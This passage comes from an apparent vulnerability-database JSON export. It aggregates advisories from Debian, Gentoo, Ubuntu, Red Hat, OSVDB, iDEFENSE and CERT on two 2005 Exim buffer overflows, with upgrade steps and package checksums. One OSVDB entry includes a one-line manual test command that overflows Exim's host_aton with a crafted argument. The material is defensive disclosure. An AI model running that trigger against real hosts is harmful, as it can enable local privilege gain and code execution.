audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.0\", prefix:\"exim\", reference:\"3.35-1woody4\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"eximon\", reference:\"3.35-1woody4\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:35", "bulletinFamily": "unix", "description": "### Background\n\nExim is an highly configurable message transfer agent (MTA) developed at the University of Cambridge. \n\n### Description\n\nBuffer overflows have been found in the host_aton() function (CAN-2005-0021) as well as in the spa_base64_to_bits() function (CAN-2005-0022), which is part of the SPA authentication code. \n\n### Impact\n\nA local attacker could trigger the buffer overflow in host_aton() by supplying an illegal IPv6 address with more than 8 components, using a command line option. The second vulnerability could be remotely exploited during SPA authentication, if it is enabled on the server. Both buffer overflows can potentially lead to the execution of arbitrary code. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll Exim users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=mail-mta/exim-4.43-r2\"", "modified": "2005-01-12T00:00:00", "published": "2005-01-12T00:00:00", "id": "GLSA-200501-23", "href": "https://security.gentoo.org/glsa/200501-23", "type": "gentoo", "title": "Exim: Two buffer overflows", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "ubuntu": [{"lastseen": "2019-05-29T17:23:35", "bulletinFamily": "unix", "description": "A flaw has been found in the host_aton() function, which can overflow a buffer if it is presented with an illegal IPv6 address that has more than 8 components. When supplying certain command line parameters, the input was not checked, so that a local attacker could possibly exploit the buffer overflow to run arbitrary code with the privileges of the Exim mail server. (CAN-2005-0021)\n\nAdditionally, the BASE64 decoder in the SPA authentication handler did not check the size of its output buffer. By sending an invalid BASE64 authentication string, a remote attacker could overflow the buffer, which could possibly be exploited to run arbitrary code with the privileges of the Exim mail server. (CAN-2005-0022)", "modified": "2005-01-07T00:00:00", "published": "2005-01-07T00:00:00", "id": "USN-56-1", "href": "https://usn.ubuntu.com/56-1/", "title": "exim4 vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2019-08-13T18:46:54", "bulletinFamily": "unix", "description": "Exim is a mail transport agent (MTA) developed at the University of\nCambridge for use on Unix systems connected to the Internet. \n\nA buffer overflow was discovered in the spa_base64_to_bits function in\nExim, as originally obtained from Samba code. If SPA authentication is\nenabled, a remote attacker may be able to exploit this vulnerability to\nexecute arbitrary code as the 'exim' user. The Common Vulnerabilities and\nExposures project (cve.mitre.org) has assigned the name CAN-2005-0022 to\nthis issue. Please note that SPA authentication is not enabled by default\nin Red Hat Enterprise Linux 4.\n\nBuffer overflow flaws were discovered in the host_aton and\ndns_build_reverse functions in Exim. A local user can trigger these flaws\nby executing exim with carefully crafted command line arguments and may be\nable to gain the privileges of the 'exim' account. The Common\nVulnerabilities and Exposures project (cve.mitre.org) has assigned the name\nCAN-2005-0021 to this issue.\n\nUsers of Exim are advised to update to these erratum packages which contain\nbackported patches to correct these issues.", "modified": "2017-09-08T12:18:48", "published": "2005-02-15T05:00:00", "id": "RHSA-2005:025", "href": "https://access.redhat.com/errata/RHSA-2005:025", "type": "redhat", "title": "(RHSA-2005:025) exim security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:08", "bulletinFamily": "software", "description": "## Vulnerability Description\nA remote overflow exists in Exim. Exim fails to have sufficient boundary checks in the 'spa_base64_to_bits()' function resulting in a buffer overflow. With a specially crafted request, an attacker can execute arbitrary code in the context of the affected application resulting in a loss of integrity.\n## Solution Description\nCurrently, there are no known workarounds or upgrades to correct this issue. However, University of Cambridge and RedHat have released a patch to address this vulnerability.\n## Short Description\nA remote overflow exists in Exim. Exim fails to have sufficient boundary checks in the 'spa_base64_to_bits()' function resulting in a buffer overflow. With a specially crafted request, an attacker can execute arbitrary code in the context of the affected application resulting in a loss of integrity.\n## References:\nSecurity Tracker: 1012771\n[Secunia Advisory ID:13713](https://secuniaresearch.flexerasoftware.com/advisories/13713/)\n[Secunia Advisory ID:13823](https://secuniaresearch.flexerasoftware.com/advisories/13823/)\n[Related OSVDB ID: 12726](https://vulners.com/osvdb/OSVDB:12726)\nOther Advisory URL: http://www.exim.org/mail-archives/exim-announce/2005/msg00000.html\nOther Advisory URL: http://www.idefense.com/application/poi/display?id=178&type=vulnerabilities&flashstatus=true\nOther Advisory URL: http://security.gentoo.org/glsa/glsa-200501-23.xml\n[Nessus Plugin ID:16111](https://vulners.com/search?query=pluginID:16111)\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2005-02/0214.html\n[CVE-2005-0022](https://vulners.com/cve/CVE-2005-0022)\nBugtraq ID: 12188\n", "modified": "2005-01-06T08:11:29", "published": "2005-01-06T08:11:29", "href": "https://vulners.com/osvdb/OSVDB:12727", "id": "OSVDB:12727", "type": "osvdb", "title": "Exim auth_spa_server Remote Overflow", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:08", "bulletinFamily": "software", "description": "## Vulnerability Description\nA local overflow exists in Exim. Exim fails to check the length of a string resulting in a buffer overflow in the dns_build_reverse() function. Exim drops SUID privileges before the vulnerable code is reached. With a specially crafted request, an attacker can further escalate privileges or retrieve the mailer uid to access email messages, resulting in a loss of integrity and confidentiality.\n## Solution Description\nUpgrade to version 4.44 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nA local overflow exists in Exim. Exim fails to check the length of a string resulting in a buffer overflow in the dns_build_reverse() function. Exim drops SUID privileges before the vulnerable code is reached. With a specially crafted request, an attacker can further escalate privileges or retrieve the mailer uid to access email messages, resulting in a loss of integrity and confidentiality.\n## Manual Testing Notes\n/usr/bin/exim -bh ::%A`perl -e 'print pack('L',0xdeadbeef') x 256'`\n## References:\nVendor URL: http://www.exim.org/\nSecurity Tracker: 1012904\nOther Advisory URL: http://www.idefense.com/application/poi/display?id=183&type=vulnerabilities\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-01/0170.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-01/0178.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-05/0282.html\nGeneric Exploit URL: http://www.securiteam.com/exploits/5WP0R1PFPM.html\n[CVE-2005-0021](https://vulners.com/cve/CVE-2005-0021)\n", "modified": "2005-01-14T17:32:26", "published": "2005-01-14T17:32:26", "href": "https://vulners.com/osvdb/OSVDB:12946", "id": "OSVDB:12946", "type": "osvdb", "title": "Exim dns_build_reverse() Local Overflow", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-04-28T13:20:08", "bulletinFamily": "software", "description": "## Vulnerability Description\nA remote overflow exists in Exim. Exim fails to properly check input to host_aton() resulting in a buffer overflow. With a specially crafted request of an IPv6 address with more than 8 components, an attacker can cause execution of arbitrary code resulting in a loss of integrity.\n## Solution Description\nCurrently, there are no known workarounds or upgrades to correct this issue. However, Exim has released a patch to address this vulnerability.\n## Short Description\nA remote overflow exists in Exim. Exim fails to properly check input to host_aton() resulting in a buffer overflow. With a specially crafted request of an IPv6 address with more than 8 components, an attacker can cause execution of arbitrary code resulting in a loss of integrity.\n## References:\nVendor URL: http://www.exim.org\n[Vendor Specific Advisory URL](http://www.debian.org/security/2005/dsa-635)\nSecurity Tracker: 1012771\n[Secunia Advisory ID:13713](https://secuniaresearch.flexerasoftware.com/advisories/13713/)\n[Secunia Advisory ID:13817](https://secuniaresearch.flexerasoftware.com/advisories/13817/)\n[Secunia Advisory ID:13823](https://secuniaresearch.flexerasoftware.com/advisories/13823/)\n[Secunia Advisory ID:13853](https://secuniaresearch.flexerasoftware.com/advisories/13853/)\n[Related OSVDB ID: 12727](https://vulners.com/osvdb/OSVDB:12727)\nOther Advisory URL: http://www.debian.org/security/2005/dsa-637\nOther Advisory URL: http://www.idefense.com/application/poi/display?id=178&type=vulnerabilities\nOther Advisory URL: http://www.exim.org/mail-archives/exim-announce/2005/msg00000.html\nOther Advisory URL: http://security.gentoo.org/glsa/glsa-200501-23.xml\n[Nessus Plugin ID:16111](https://vulners.com/search?query=pluginID:16111)\n[CVE-2005-0021](https://vulners.com/cve/CVE-2005-0021)\n", "modified": "2005-01-06T08:11:29", "published": "2005-01-06T08:11:29", "href": "https://vulners.com/osvdb/OSVDB:12726", "id": "OSVDB:12726", "type": "osvdb", "title": "Exim host_aton Command Line Overflow", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:11", "bulletinFamily": "software", "description": "Exim auth_spa_server() Buffer Overflow Vulnerability \r\n\r\niDEFENSE Security Advisory [IDEF0731]\r\nwww.idefense.com/application/poi/display?id=178&type=vulnerabilities\r\nJanuary 07, 2004\r\n\r\nI. BACKGROUND\r\n\r\nExim is a message transfer agent developed for use on Unix systems. More\r\n\r\ninformation is available at: \r\n\r\n http://www.exim.org/\r\n\r\nII. DESCRIPTION\r\n\r\nRemote exploitation of a buffer overflow vulnerability in Exim 4.41 may\r\nallow execution of arbitrary commands with elevated privileges.\r\n\r\nExim is a message transfer agent developed for use on Unix systems. The \r\nproblem specifically exists in the auth_spa_server function. The \r\nfunction fails to check the length of input to spa_base64_to_bits(), \r\nwhich decodes a Base64-encoded string into a buffer of a fixed length. \r\nThis string is user-controlled and passed to the program from a remote \r\nconnection.\r\n\r\nIII. ANALYSIS\r\n\r\nExploitation of this vulnerability will give an attacker remote access \r\nto the mailer uid. The exim mailer is setuid root, but drops privileges \r\nbefore the vulnerable code is reached. A remote attacker may be able to \r\nuse other vulnerabilities to further elevate their privileges.\r\n\r\nThis vulnerability is only exploitable when the spa authentication \r\nmethod has been configured by setting AUTH_SPA=yes in Local/Makefile \r\nwhen building it.\r\n\r\nIV. DETECTION\r\n\r\nExim versions 4.40 and 4.41 have been confirmed vulnerable. The source \r\ncode for version 4.42 suggests that it is vulnerable. It is suspected \r\nthat previous versions are also vulnerable.\r\n\r\nTo determine if the Exim version being used is vulnerable, connect to\r\nport 25 of the machine with Exim installed and type:\r\n\r\n EHLO localhost\r\n\r\nIf AUTH NTLM appears in the output the application may be vulnerable.\r\n\r\nV. WORKAROUND\r\n\r\niDEFENSE is currently unaware of any effective workarounds for this \r\nvulnerability.\r\n\r\nVI. VENDOR RESPONSE\r\n\r\nA patch for Exim release 4.43 which addresses this vulnerability is\r\navailable at:\r\n\r\n http://www.exim.org/mail-archives/exim-announce/2005/msg00000.html\r\n\r\nThe patch will be incorporated into a future Exim release (4.50).\r\n\r\nVII. CVE INFORMATION\r\n\r\nThe Common Vulnerabilities and Exposures (CVE) project has assigned the\r\nnames CAN-2005-0022 to these issues. This is a candidate for inclusion\r\nin the CVE list (http://cve.mitre.org), which standardizes names for\r\nsecurity problems.\r\n\r\nVIII. DISCLOSURE TIMELINE\r\n\r\n12/23/2004 Initial vendor notification\r\n12/29/2004 Initial vendor response\r\n01/07/2004 Coordinated public disclosure\r\n\r\nIX. CREDIT\r\n\r\nThe discoverer of this vulnerability wishes to remain anonymous.\r\n\r\nGet paid for vulnerability research\r\nhttp://www.idefense.com/poi/teams/vcp.jsp\r\n\r\nX. LEGAL NOTICES\r\n\r\nCopyright (c) 2004 iDEFENSE, Inc.\r\n\r\nPermission is granted for the redistribution of this alert\r\nelectronically. It may not be edited in any way without the express\r\nwritten consent of iDEFENSE. If you wish to reprint the whole or any\r\npart of this alert in any other medium other than electronically, please\r\nemail customerservice@idefense.com for permission.\r\n\r\nDisclaimer: The information in the advisory is believed to be accurate\r\nat the time of publishing based on currently available information. Use\r\nof the information constitutes acceptance for use in an AS IS condition.\r\nThere are no warranties with regard to this information. Neither the\r\nauthor nor the publisher accepts any liability for any direct, indirect,\r\nor consequential loss or damage arising from use of, or reliance on,\r\nthis information.", "modified": "2005-01-08T00:00:00", "published": "2005-01-08T00:00:00", "id": "SECURITYVULNS:DOC:7534", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:7534", "title": "iDEFENSE Security Advisory [IDEF0731] Exim auth_spa_server() Buffer Overflow Vulnerability", "type": "securityvulns", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:11", "bulletinFamily": "software", "description": "Exim host_aton() Buffer Overflow Vulnerability\r\n\r\niDEFENSE Security Advisory [IDEF0725]\r\nhttp://www.idefense.com/application/poi/display?type=vulnerabilities\r\nJanuary 07, 2005\r\n\r\nI. BACKGROUND\r\n\r\nExim is a message transfer agent developed for use on Unix systems. More\r\n\r\ninformation is available at: \r\n\r\n http://www.exim.org/\r\n\r\nII. DESCRIPTION\r\n\r\nLocal exploitation of a buffer overflow vulnerability in Exim 4.41 may \r\nallow execution of arbitrary commands with elevated privileges.\r\n\r\nThe problem specifically exists in the host_aton function. The function \r\nfails to check the number of elements it stores in a fixed size array. \r\nThe elements come from a user-controlled string and are passed into the \r\nprogram from a command line option.\r\n\r\nIII. ANALYSIS\r\n\r\nExploitation of this vulnerability will give an attacker access to the \r\nmailer uid. The exim mailer is setuid root, but drops privileges before \r\nthe vulnerable code is reached. Having the mailer uid may allow access \r\nto sensitive information in e-mail messages or possibly further \r\nelevation.\r\n\r\nIV. DETECTION\r\n\r\nExim versions 4.40 and 4.41 have been confirmed vulnerable. The source \r\ncode for version 4.42 suggests that it is also vulnerable. It is \r\nsuspected that previous versions are vulnerable.\r\n\r\nV. WORKAROUND\r\n\r\niDEFENSE is currently unaware of any effective workarounds for this \r\nvulnerability.\r\n\r\nVI. VENDOR RESPONSE\r\n\r\nA patch for Exim release 4.43 which addresses this vulnerability is\r\navailable at:\r\n\r\n http://www.exim.org/mail-archives/exim-announce/2005/msg00000.html\r\n\r\nThe patch will be incorporated into a future Exim release (4.50).\r\n\r\nVII. CVE INFORMATION\r\n\r\nThe Common Vulnerabilities and Exposures (CVE) project has assigned the\r\nnames CAN-2005-0021 to these issues. This is a candidate for inclusion\r\nin the CVE list (http://cve.mitre.org), which standardizes names for\r\nsecurity problems.\r\n\r\nVIII. DISCLOSURE TIMELINE\r\n\r\n12/23/2004 Initial vendor notification\r\n12/29/2004 Initial vendor response\r\n01/07/2005 Public disclosure\r\n\r\nIX. CREDIT\r\n\r\nThe discoverer of this vulnerability wishes to remain anonymous.\r\n\r\nGet paid for vulnerability research\r\nhttp://www.idefense.com/poi/teams/vcp.jsp\r\n\r\nX. LEGAL NOTICES\r\n\r\nCopyright (c) 2004 iDEFENSE, Inc.\r\n\r\nPermission is granted for the redistribution of this alert\r\nelectronically. It may not be edited in any way without the express\r\nwritten consent of iDEFENSE. If you wish to reprint the whole or any\r\npart of this alert in any other medium other than electronically, please\r\nemail customerservice@idefense.com for permission.\r\n\r\nDisclaimer: The information in the advisory is believed to be accurate\r\nat the time of publishing based on currently available information. Use\r\nof the information constitutes acceptance for use in an AS IS condition.\r\nThere are no warranties with regard to this information. Neither the\r\nauthor nor the publisher accepts any liability for any direct, indirect,\r\nor consequential loss or damage arising from use of, or reliance on,\r\nthis information.", "modified": "2005-01-08T00:00:00", "published": "2005-01-08T00:00:00", "id": "SECURITYVULNS:DOC:7533", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:7533", "title": "iDEFENSE Security Advisory [IDEF0725] Exim host_aton() Buffer Overflow Vulnerability", "type": "securityvulns", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "debian": [{"lastseen": "2019-05-30T02:22:49", "bulletinFamily": "unix", "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 637-1 security@debian.org\nhttp://www.debian.org/security/ Martin Schulze\nJanuary 13th, 2005 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : exim-tls\nVulnerability : buffer overflow\nProblem-Type : remote\nDebian-specific: no\nCVE ID : CAN-2005-0021\nDebian Bug : 289046\n\nPhilip Hazel announced a buffer overflow in the host_aton function in\nexim-tls, the SSL-enabled version of the default mail-tranport-agent\nin Debian, which can lead to the execution of arbitrary code via an\nillegal IPv6 address.\n\nFor the stable distribution (woody) this problem has been fixed in\nversion 3.35-3woody3.\n\nIn the unstable distribution (sid) this package does not exist\nanymore.\n\nWe recommend that you upgrade your exim-tls package.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/e/exim-tls/exim-tls_3.35-3woody3.dsc\n Size/MD5 checksum: 677 059e83c496e959d01bcca0a11637b017\n http://security.debian.org/pool/updates/main/e/exim-tls/exim-tls_3.35-3woody3.diff.gz\n Size/MD5 checksum: 80492 90d594f60ae815a780faa5f9c9d1859d\n http://security.debian.org/pool/updates/main/e/exim-tls/exim-tls_3.35.orig.tar.gz\n Size/MD5 checksum: 1271057 42d362e40a21bd7ffc298f92c8bd986a\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/e/exim-tls/exim-tls_3.35-3woody3_alpha.deb\n Size/MD5 checksum: 873682 935e1dddb27a713d562b905c2951dea7\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/e/exim-tls/exim-tls_3.35-3woody3_arm.deb\n Size/MD5 checksum: 784148 c97ded116303fe5ee1c4a9f741350c58\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/e/exim-tls/exim-tls_3.35-3woody3_i386.deb\n Size/MD5 checksum: 759442 1477e25fe953ee209ec86a67a59306ba\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/e/exim-tls/exim-tls_3.35-3woody3_ia64.deb\n Size/MD5 checksum: 974058 74cd3707971105a75398a0ce46e4bb80\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/e/exim-tls/exim-tls_3.35-3woody3_hppa.deb\n Size/MD5 checksum: 814316 56d73dab6e0bbd4df6068c5f9f065491\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/e/exim-tls/exim-tls_3.35-3woody3_m68k.deb\n Size/MD5 checksum: 736730 ba35f1bd8dcfaf6ef9f35aded9176cab\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/e/exim-tls/exim-tls_3.35-3woody3_mips.deb\n Size/MD5 checksum: 824408 0f8af4bf6f39d1dbb10e05e5717e3115\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/e/exim-tls/exim-tls_3.35-3woody3_mipsel.deb\n Size/MD5 checksum: 825160 abfc0dc6c75fc7fafba89f6673bd1913\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/e/exim-tls/exim-tls_3.35-3woody3_powerpc.deb\n Size/MD5 checksum: 792574 f8c3a2d72890f766a72a6ddc39f2ea31\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/e/exim-tls/exim-tls_3.35-3woody3_s390.deb\n Size/MD5 checksum: 779236 aca9521a7b347d291e158a919cca0ed5\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/e/exim-tls/exim-tls_3.35-3woody3_sparc.deb\n Size/MD5 checksum: 782800 5e3a9478dc77a0943ce0c41611973c95\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n\n", "modified": "2005-01-13T00:00:00", "published": "2005-01-13T00:00:00", "id": "DEBIAN:DSA-637-1:4973F", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2005/msg00015.html", "title": "[SECURITY] [DSA 637-1] New exim-tls packages fix arbitrary code execution", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-30T02:22:49", "bulletinFamily": "unix", "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 635-1 security@debian.org\nhttp://www.debian.org/security/ Martin Schulze\nJanuary 12th, 2005 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : exim\nVulnerability : buffer overflow\nProblem-Type : remote\nDebian-specific: no\nCVE ID : CAN-2005-0021\nDebian Bug : 289046\n\nPhilip Hazel announced a buffer overflow in the host_aton function in\nexim, the default mail-tranport-agent in Debian, which can lead to the\nexecution of arbitrary code via an illegal IPv6 address.\n\nFor the stable distribution (woody) this problem has been fixed in\nversion 3.35-1woody4.\n\nFor the unstable distribution (sid) this problem has been fixed in\nversion 3.36-13 of exim and 4.34-10 of exim4.\n\nWe recommend that you upgrade your exim and exim4 packages.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/e/exim/exim_3.35-1woody4.dsc\n Size/MD5 checksum: 661 d97ecab579bd3dbaa3e9be00b8b16d85\n http://security.debian.org/pool/updates/main/e/exim/exim_3.35-1woody4.diff.gz\n Size/MD5 checksum: 80195 a02abeefa9d1145ae623ad661aab5f5a\n http://security.debian.org/pool/updates/main/e/exim/exim_3.35.orig.tar.gz\n Size/MD5 checksum: 1271057 42d362e40a21bd7ffc298f92c8bd986a\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/e/exim/exim_3.35-1woody4_alpha.deb\n Size/MD5 checksum: 872796 a46f5dc95d777366cb492eb57ec8dd9f\n http://security.debian.org/pool/updates/main/e/exim/eximon_3.35-1woody4_alpha.deb\n Size/MD5 checksum: 52318 bf93e35aec9f401d8413015c50f5cbae\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/e/exim/exim_3.35-1woody4_arm.deb\n Size/MD5 checksum: 785980 5ced90e4c4ecd1ca6a60980634b309e8\n http://security.debian.org/pool/updates/main/e/exim/eximon_3.35-1woody4_arm.deb\n Size/MD5 checksum: 43514 07b7324395ff66f68db354c6b4589db7\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/e/exim/exim_3.35-1woody4_i386.deb\n Size/MD5 checksum: 759270 9001a456b0a34f4bf5de88d901c70a97\n http://security.debian.org/pool/updates/main/e/exim/eximon_3.35-1woody4_i386.deb\n Size/MD5 checksum: 39210 78e5eecee7101a355ddabec9d0f07b98\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/e/exim/exim_3.35-1woody4_ia64.deb\n Size/MD5 checksum: 972852 43f4fc30483d8ad5c42e031fd64a9e8d\n http://security.debian.org/pool/updates/main/e/exim/eximon_3.35-1woody4_ia64.deb\n Size/MD5 checksum: 65166 cdc921d9be2ec60b5f0ed95a5b976732\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/e/exim/exim_3.35-1woody4_hppa.deb\n Size/MD5 checksum: 815358 c506baffb4404f32762468fbc494551c\n http://security.debian.org/pool/updates/main/e/exim/eximon_3.35-1woody4_hppa.deb\n Size/MD5 checksum: 48294 d90efe5be79e966e07a7cbe8e9013939\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/e/exim/exim_3.35-1woody4_m68k.deb\n Size/MD5 checksum: 737856 aefe6b63ebd03e9fe449afe22e752547\n http://security.debian.org/pool/updates/main/e/exim/eximon_3.35-1woody4_m68k.deb\n Size/MD5 checksum: 37752 e0d2b938e50c3b408928b8150459ad2b\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/e/exim/exim_3.35-1woody4_mips.deb\n Size/MD5 checksum: 824458 0c1db679287a6de37f2c320f335c650c\n http://security.debian.org/pool/updates/main/e/exim/eximon_3.35-1woody4_mips.deb\n Size/MD5 checksum: 48882 1670c36409482a8a870becf826f7ae68\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/e/exim/exim_3.35-1woody4_mipsel.deb\n Size/MD5 checksum: 824846 88564f1d1b0c1781587d5db1bccdde77\n http://security.debian.org/pool/updates/main/e/exim/eximon_3.35-1woody4_mipsel.deb\n Size/MD5 checksum: 48778 6a7002c766a84dd81eed39d23f8709d5\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/e/exim/exim_3.35-1woody4_powerpc.deb\n Size/MD5 checksum: 794244 abfa2009cd6417101d120a5980641012\n http://security.debian.org/pool/updates/main/e/exim/eximon_3.35-1woody4_powerpc.deb\n Size/MD5 checksum: 44794 ea626fcb485a423fb56e61a1c4ae67e9\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/e/exim/exim_3.35-1woody4_s390.deb\n Size/MD5 checksum: 780026 bc9a3b5488cd7ee72c290f86f601beec\n http://security.debian.org/pool/updates/main/e/exim/eximon_3.35-1woody4_s390.deb\n Size/MD5 checksum: 43930 f50688c682bcaeabfbd47c9e46a06143\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/e/exim/exim_3.35-1woody4_sparc.deb\n Size/MD5 checksum: 785298 1841407d21f544cf2645e373a6caad15\n http://security.debian.org/pool/updates/main/e/exim/eximon_3.35-1woody4_sparc.deb\n Size/MD5 checksum: 42444 632b5aadc5c930c7c3e956fef10d5ffe\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n\n", "modified": "2005-01-12T00:00:00", "published": "2005-01-12T00:00:00", "id": "DEBIAN:DSA-635-1:15035", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2005/msg00013.html", "title": "[SECURITY] [DSA 635-1] New exim packages fix arbitrary code execution", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cert": [{"lastseen": "2019-10-09T19:52:04", "bulletinFamily": "info", "description": "### Overview \n\nThe Exim Mail Transfer Agent (MTA) contains a buffer overflow that allows a local attacker to execute arbitrary code.\n\n### Description \n\nExim MTA is an open-source mail transport agent distributed by the University of Cambridge. A lack of input validation on user supplied data may allow a buffer overflow to occur in Exim. If a local attacker supplies the Exim with a specially crafted command line options, that attacker may be able to cause a buffer overflow in the `dns_build_reverse()`routine.\n\nAccording to public reports, this vulnerability exists in Exim versions prior to 4.44. \n \n--- \n \n### Impact \n\nA local attacker may be able to execute arbitrary code with elevated (`root`) privileges. \n \n--- \n \n### Solution \n\n**Upgrade** \n \nThis issue has been addressed in [Exim version 4.4.](<http://www.exim.org/>) \n \n--- \n \n### Vendor Information\n\n132992\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Vendor has issued information\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n__ Affected __ Unknown __ Unaffected \n\n**Javascript is disabled. Click here to view vendors.**\n\n### __ Conectiva\n\nUpdated: January 28, 2005 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23132992 Feedback>).\n\n### __ Debian\n\nUpdated: January 28, 2005 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe Debian advisories for this vulnerability can be found at: \n\n \n<http://www.nl.debian.org/security/2005/dsa-635> \nand \n<http://www.debian.org/security/2005/dsa-637>\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23132992 Feedback>).\n\n### __ Engarde\n\nUpdated: January 28, 2005 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional 